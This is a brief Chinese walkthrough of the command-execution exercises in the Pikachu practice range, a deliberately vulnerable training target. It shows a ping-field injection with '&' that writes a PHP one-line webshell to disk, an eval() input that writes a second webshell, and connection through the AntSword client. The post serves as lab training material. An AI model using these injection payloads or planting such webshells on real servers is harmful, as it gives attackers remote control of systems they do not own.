Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
吉吉613 分钟前
Docker拉取镜像解决办法
运维·docker·容器
馨谙3 分钟前
Linux面试题----文件权限,chmod,chown,suid,sgid,粘滞位,umask
linux·运维·服务器
徐子元竟然被占了!!9 分钟前
常用端口学习
运维·网络·学习
爱蛙科技17 分钟前
近红外应用 | 通过光谱分析,360°测试鉴定苹果
安全
青衫客3640 分钟前
Linux 磁盘挂载全流程实战——从新盘初始化到安全开机自启
linux·运维·服务器
小北方城市网42 分钟前
微服务注册中心与配置中心实战(Nacos 版):实现服务治理与配置统一
人工智能·后端·安全·职场和发展·wpf·restful
轻造科技1 小时前
设备点检系统+移动端APP:替代纸质点检表,漏检率降为0
网络·安全·web安全
pingao1413781 小时前
预警先行,安全随行——道路气象监测站守护每一段旅程
安全
大江东去浪淘尽千古风流人物1 小时前
【DSP】xiBoxFilter_3x3_U8 dsp VS cmodel
linux·运维·人工智能·算法·vr
草莓熊Lotso1 小时前
Python 入门超详细指南:环境搭建 + 核心优势 + 应用场景(零基础友好)
运维·开发语言·人工智能·python·深度学习·学习·pycharm